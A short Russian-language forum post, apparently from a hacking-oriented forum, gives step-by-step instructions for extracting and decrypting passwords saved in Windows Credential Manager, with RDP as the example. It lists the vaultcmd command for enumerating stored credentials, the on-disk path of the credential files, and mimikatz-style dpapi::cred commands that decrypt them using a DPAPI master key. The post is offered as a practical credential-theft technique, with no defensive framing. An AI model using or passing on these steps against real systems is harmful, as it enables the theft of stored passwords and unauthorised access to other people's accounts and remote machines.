• Добро пожаловать на сайт - Forumteam.bet !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

Как извлечь данные из диспетчера учетных данных.

Tomas Shelby

Проявляет активность
Местный
Регистрация
20.08.20
Рассмотрим работу с диспетчером учетных данных на примере RDP.

50.png

Тёмная
Найти те же данные с помощью командной строки можно следующим образом (для английской локалки следует использовать строку /listcreds:»Windows Credentials».):

1

> vaultcmd /listcreds:"Учетные данные Windows" /all

51.png


Эти учетные данные хранятся в каталоге пользователя:

1

C:\Users\<USER>\AppData\Local\Microsoft\Credentials\



52.png

Посмотрим на эти данные.

1

dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище]

52.png


Самое интересное здесь — это pbData (данные, которые нужно расшифровать) и guidMasterKey. Как получить мастер-ключ, мы рассмотрели раньше (эту стадию мы пропустим). Давайте расшифруем учетные данные.

1

dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище] /masterkeys:[мастер-ключ]

52.png

Подобным образом можно извлечь любые данные, сохраненные в WCM.

На этом все. Теперь вы знаете, как расшифровать и просмотреть пароль в диспетчере учетных данных Windows.
 
Сверху Снизу